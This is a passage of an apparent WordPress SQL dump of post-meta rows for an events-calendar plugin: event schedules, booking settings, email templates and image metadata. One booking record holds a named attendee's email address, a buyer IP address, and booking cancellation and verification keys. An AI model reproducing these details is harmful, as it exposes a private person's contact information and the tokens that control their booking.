:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(178522,268171,'mec_hourly_schedules','a:0:{}'),(178521,268171,'mec_not_in_days',''),(178520,268171,'mec_in_days',''),(178519,268171,'mec_advanced_days','a:0:{}'),(178518,268171,'mec_repeat_end_at_date',''),(178517,268171,'mec_repeat_end_at_occurrences',''),(178516,268171,'mec_repeat_end',''),(178515,268171,'mec_repeat_interval','1'),(178514,268171,'mec_repeat_type',''),(178513,268171,'mec_repeat_status','0'),(178506,268171,'mec_start_time_ampm','PM'),(178507,268171,'mec_start_day_seconds','50400'),(178508,268171,'mec_end_date','2023-04-11'),(178509,268171,'mec_end_time_hour','3'),(178510,268171,'mec_end_time_minutes','0'),(178511,268171,'mec_end_time_ampm','PM'),(178512,268171,'mec_end_day_seconds','54000'),(178503,268171,'mec_start_date','2023-04-11'),(178504,268171,'mec_start_time_hour','2'),(178505,268171,'mec_start_time_minutes','0'),(178502,268171,'mec_public','1'),(178501,268171,'mec_countdown_method','global'),(178500,268171,'mec_timezone','global'),(178499,268171,'mec_comment',''),(178498,268171,'mec_hide_end_time','0'),(178497,268171,'mec_hide_time','0'),(178496,268171,'one_occurrence','0'),(178495,268171,'mec_allday','0'),(178494,268171,'mec_certain_weekdays','a:0:{}'),(178487,268171,'mec_more_info_target','_self'),(178488,268171,'mec_cost',''),(178489,268171,'mec_currency','a:0:{}'),(178490,268171,'mec_additional_organizer_ids','a:0:{}'),(178491,268171,'mec_additional_location_ids','a:0:{}'),(178492,268171,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-11\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-11\";s:4:\"hour\";s:1:\"3\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(178493,268171,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(178486,268171,'mec_more_info_title',''),(178485,268171,'mec_more_info',''),(178484,268171,'mec_read_more',''),(178483,268171,'mec_organizer_id','1'),(178482,268171,'mec_dont_show_map','0'),(178481,268171,'mec_location_id','118'),(178480,268171,'mec_color',''),(178479,268171,'protect_children',''),(178478,268170,'mec_gateway_label','Free'),(178477,268170,'mec_gateway','MEC_gateway_free'),(178476,268170,'mec_price','0'),(178475,268170,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:21:\"suesmith332@gmail.com\";s:4:\"name\";s:9:\"Sue Smith\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"136.36.90.194\";}}'),(178474,268170,'mec_ticket_price_1','0'),(178473,268170,'mec_booking_location','129'),(178472,268170,'mec_book_date_submit','20230306200758'),(178471,268170,'mec_attention_time_end','1678663800'),(178470,268170,'mec_attention_time_start','1678617000'),(191442,269010,'mec_additional_organizer_ids','a:0:{}'),(178461,268170,'mec_cancellation_key','3d7b9ac1025938c759ab9d98b94b60fc'),(178462,268170,'mec_confirmed','1'),(178463,268170,'mec_event_id','268027'),(178464,268170,'mec_date','1678617000:1678663800'),(178465,268170,'mec_ticket_id',',1,'),(178466,268170,'mec_booking_time','2023-03-06 20:07:58'),(178467,268170,'mec_all_dates','a:0:{}'),(178468,268170,'mec_other_dates','a:0:{}'),(178469,268170,'mec_attention_time','1678617000:1678663800'),(191441,269010,'mec_organizer_id','0'),(191439,269010,'mec_location_id','0'),(191440,269010,'mec_additional_location_ids','a:0:{}'),(191438,269010,'_bgppb_default_editor','bgppb'),(191437,269010,'boldgrid_in_page_containers','1'),(191436,269010,'protect_children',''),(176414,267812,'protect_children',''),(176415,267812,'mec_color',''),(176416,267812,'mec_location_id','132'),(176417,267812,'mec_dont_show_map','0'),(176418,267812,'mec_organizer_id','1'),(176419,267812,'mec_read_more',''),(176420,267812,'mec_more_info',''),(176421,267812,'mec_more_info_title',''),(176422,267812,'mec_more_info_target','_self'),(176423,267812,'mec_cost',''),(176424,267812,'mec_currency','a:0:{}'),(176425,267812,'mec_additional_organizer_ids','a:0:{}'),(176426,267812,'mec_additional_location_ids','a:0:{}'),(176427,267812,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-19\";s:4:\"hour\";s:1:\"4\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-19\";s:4:\"hour\";s:1:\"5\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(176428,267812,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(176429,267812,'mec_certain_weekdays','a:0:{}'),(176430,267812,'mec_allday','0'),(176431,267812,'one_occurrence','0'),(176432,267812,'mec_hide_time','0'),(176433,267812,'mec_hide_end_time','0'),(176434,267812,'mec_comment',''),(176435,267812,'mec_timezone','global'),(176436,267812,'mec_countdown_method','global'),(176437,267812,'mec_public','1'),(176438,267812,'mec_start_date','2023-02-19'),(176439,267812,'mec_start_time_hour','4'),(176440,267812,'mec_start_time_minutes','0'),(176441,267812,'mec_start_time_ampm','PM'),(176442,267812,'mec_start_day_seconds','57600'),(176443,267812,'mec_end_date','2023-02-19'),(176444,267812,'mec_end_time_hour','5'),(176445,267812,'mec_end_time_minutes','30'),(176446,267812,'mec_end_time_ampm','PM'),(176447,267812,'mec_end_day_seconds','63000'),(176448,267812,'mec_repeat_status','0'),(176449,267812,'mec_repeat_type',''),(176450,267812,'mec_repeat_interval','1'),(176451,267812,'mec_repeat_end',''),(176452,267812,'mec_repeat_end_at_occurrences',''),(176453,267812,'mec_repeat_end_at_date',''),(176454,267812,'mec_advanced_days','a:0:{}'),(176455,267812,'mec_in_days',''),(176456,267812,'mec_not_in_days',''),(176457,267812,'mec_hourly_schedules','a:0:{}'),(176458,267812,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(176459,267812,'mec_tickets','a:0:{}'),(176460,267812,'mec_fees_global_inheritance','1'),(176461,267812,'mec_fees','a:0:{}'),(176462,267812,'mec_ticket_variations_global_inheritance','1'),(176463,267812,'mec_ticket_variations','a:0:{}'),(176464,267812,'mec_reg_fields_global_inheritance','1'),(176465,267812,'mec_reg_fields','a:0:{}'),(176466,267812,'mec_bfixed_fields','a:0:{}'),(176467,267812,'mec_op','a:0:{}'),(176468,267812,'mec_fields','a:0:{}'),(176469,267812,'mec_event_status','EventScheduled'),(176470,267812,'mec_moved_online_link',''),(176471,267812,'mec_cancelled_reason',''),(176472,267812,'mec_display_cancellation_reason_in_single_page',''),(176473,267812,'boldgrid_hide_page_title','0'),(176474,267812,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176475,267812,'passster_activate_global_protection',NULL),(176476,267812,'passster_activate_protection',NULL),(176477,267812,'passster_protection_type','password'),(176478,267812,'boldgrid_in_page_containers','1'),(176480,267812,'_dp_original','267696'),(176481,267812,'_edit_lock','1675382972:2'),(176482,267812,'_edit_last','2'),(176483,267812,'_thumbnail_id','266816'),(176484,267813,'protect_children',''),(176485,267813,'mec_color',''),(176486,267813,'mec_location_id','131'),(176487,267813,'mec_dont_show_map','0'),(176488,267813,'mec_organizer_id','1'),(176489,267813,'mec_read_more',''),(176490,267813,'mec_more_info',''),(176491,267813,'mec_more_info_title',''),(176492,267813,'mec_more_info_target','_self'),(176493,267813,'mec_cost',''),(176494,267813,'mec_currency','a:0:{}'),(176495,267813,'mec_additional_organizer_ids','a:0:{}'),(176496,267813,'mec_additional_location_ids','a:0:{}'),(176497,267813,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-12\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-12\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(176498,267813,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(176499,267813,'mec_certain_weekdays','a:0:{}'),(176500,267813,'mec_allday','0'),(176501,267813,'one_occurrence','0'),(176502,267813,'mec_hide_time','0'),(176503,267813,'mec_hide_end_time','0'),(176504,267813,'mec_comment',''),(176505,267813,'mec_timezone','global'),(176506,267813,'mec_countdown_method','global'),(176507,267813,'mec_public','1'),(176508,267813,'mec_start_date','2023-02-12'),(176509,267813,'mec_start_time_hour','1'),(176510,267813,'mec_start_time_minutes','0'),(176511,267813,'mec_start_time_ampm','PM'),(176512,267813,'mec_start_day_seconds','46800'),(176513,267813,'mec_end_date','2023-02-12'),(176514,267813,'mec_end_time_hour','2'),(176515,267813,'mec_end_time_minutes','30'),(176516,267813,'mec_end_time_ampm','PM'),(176517,267813,'mec_end_day_seconds','52200'),(176518,267813,'mec_repeat_status','0'),(176519,267813,'mec_repeat_type',''),(176520,267813,'mec_repeat_interval','1'),(176521,267813,'mec_repeat_end',''),(176522,267813,'mec_repeat_end_at_occurrences',''),(176523,267813,'mec_repeat_end_at_date',''),(176524,267813,'mec_advanced_days','a:0:{}'),(176525,267813,'mec_in_days',''),(176526,267813,'mec_not_in_days',''),(176527,267813,'mec_hourly_schedules','a:0:{}'),(176528,267813,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(176529,267813,'mec_tickets','a:0:{}'),(176530,267813,'mec_fees_global_inheritance','1'),(176531,267813,'mec_fees','a:0:{}'),(176532,267813,'mec_ticket_variations_global_inheritance','1'),(176533,267813,'mec_ticket_variations','a:0:{}'),(176534,267813,'mec_reg_fields_global_inheritance','1'),(176535,267813,'mec_reg_fields','a:0:{}'),(176536,267813,'mec_bfixed_fields','a:0:{}'),(176537,267813,'mec_op','a:0:{}'),(176538,267813,'mec_fields','a:0:{}'),(176539,267813,'mec_event_status','EventScheduled'),(176540,267813,'mec_moved_online_link',''),(176541,267813,'mec_cancelled_reason',''),(176542,267813,'mec_display_cancellation_reason_in_single_page',''),(176543,267813,'boldgrid_hide_page_title','0'),(176544,267813,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(176545,267813,'passster_activate_global_protection',NULL),(176546,267813,'passster_activate_protection',NULL),(176547,267813,'passster_protection_type','password'),(176548,267813,'boldgrid_in_page_containers','1'),(176550,267813,'_dp_original','267696'),(176551,267813,'_edit_lock','1675383513:2'),(176552,267813,'_edit_last','2'),(176553,267814,'_wp_attached_file','2023/02/hands-light-1.jpg'),(176554,267814,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:837;s:6:\"height\";i:472;s:4:\"file\";s:25:\"2023/02/hands-light-1.jpg\";s:8:\"filesize\";i:33891;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"hands-light-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5972;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"hands-light-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3690;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"hands-light-1-768x433.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:433;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22335;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"hands-light-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9384;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"hands-light-1-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13138;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"hands-light-1-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9821;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"hands-light-1-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:11603;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176555,267813,'_thumbnail_id','267814'),(188214,268837,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(188213,268837,'mec_hourly_schedules','a:0:{}'),(176593,267823,'original-file','2023/02/soul-adv-banner-1-updraft-pre-smush-original.png'),(176594,267823,'smush-complete','1'),(176595,267823,'smush-info','The file was compressed from 42.25 KB to 19.15 KB saving 54.67 percent using WP-Optimize'),(176596,267823,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:43261;s:12:\"smushed-size\";i:19609;s:15:\"savings-percent\";d:54.67;s:10:\"sizes-info\";a:6:{s:4:\"full\";a:2:{s:8:\"original\";i:43261;s:10:\"compressed\";i:19609;}s:6:\"medium\";a:2:{s:8:\"original\";i:14317;s:10:\"compressed\";i:7238;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7860;s:10:\"compressed\";i:5987;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:17518;s:10:\"compressed\";i:10384;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:29474;s:10:\"compressed\";i:15120;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22998;s:10:\"compressed\";i:12796;}}}'),(176601,267828,'original-file','2023/02/soul-adv-banner-2-updraft-pre-smush-original.png'),(176602,267828,'smush-complete','1'),(176603,267828,'smush-info','The file was compressed from 98.08 KB to 51.85 KB saving 47.13 percent using WP-Optimize'),(176604,267828,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:100439;s:12:\"smushed-size\";i:53098;s:15:\"savings-percent\";d:47.13;s:10:\"sizes-info\";a:8:{s:4:\"full\";a:2:{s:8:\"original\";i:100439;s:10:\"compressed\";i:53098;}s:6:\"medium\";a:2:{s:8:\"original\";i:14505;s:10:\"compressed\";i:7055;}s:5:\"large\";a:2:{s:8:\"original\";i:87321;s:10:\"compressed\";i:51754;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:9852;s:10:\"compressed\";i:6776;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:58664;s:10:\"compressed\";i:31503;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:17914;s:10:\"compressed\";i:12556;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:31498;s:10:\"compressed\";i:19755;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:24761;s:10:\"compressed\";i:16185;}}}'),(176605,267852,'_wp_attached_file','2023/02/esc-sun-lensflare-2.jpg'),(176606,267852,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:464;s:6:\"height\";i:422;s:4:\"file\";s:31:\"2023/02/esc-sun-lensflare-2.jpg\";s:8:\"filesize\";i:23565;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-2-300x273.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:273;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9374;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:3672;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10392;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-2-464x324.jpg\";s:5:\"width\";i:464;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15111;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10330;}s:8:\"tileview\";a:5:{s:4:\"file\";s:31:\"esc-sun-lensflare-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12554;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176607,267852,'original-file','2023/02/esc-sun-lensflare-2-updraft-pre-smush-original.jpg'),(176608,267852,'smush-complete','1'),(176609,267852,'smush-info','The file was compressed from 23.01 KB to 22.05 KB saving 4.18 percent using WP-Optimize'),(176610,267852,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:23565;s:12:\"smushed-size\";i:22581;s:15:\"savings-percent\";d:4.18;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:23565;s:10:\"compressed\";i:22581;}s:6:\"medium\";a:2:{s:8:\"original\";i:9374;s:10:\"compressed\";i:9308;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:3672;s:10:\"compressed\";i:3606;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:10392;s:10:\"compressed\";i:10392;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:15111;s:10:\"compressed\";i:15111;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:10330;s:10:\"compressed\";i:10330;}s:8:\"tileview\";a:2:{s:8:\"original\";i:12554;s:10:\"compressed\";i:12554;}}}'),(178460,268170,'mec_verification_key','227a01d27a38eefcf7e791aeb38b4b25'),(178459,268170,'mec_verified','1'),(178458,268170,'mec_user_id','1000072'),(178457,268170,'mec_transaction_id','ADP84617'),(176615,267865,'_wp_attached_file','2023/02/email-whitelist-2.jpg'),(176616,267865,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1080;s:6:\"height\";i:427;s:4:\"file\";s:29:\"2023/02/email-whitelist-2.jpg\";s:8:\"filesize\";i:70773;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"email-whitelist-2-300x119.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9380;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"email-whitelist-2-1024x405.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:405;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:55566;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"email-whitelist-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6906;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"email-whitelist-2-768x304.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:304;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:36716;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"email-whitelist-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19105;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"email-whitelist-2-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:28873;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"email-whitelist-2-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21206;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"email-whitelist-2-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23309;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(176617,267865,'original-file','2023/02/email-whitelist-2-updraft-pre-smush-original.jpg'),(176618,267865,'smush-complete','1'),(176619,267865,'smush-info','The file was compressed from 69.11 KB to 68.27 KB saving 1.22 percent using 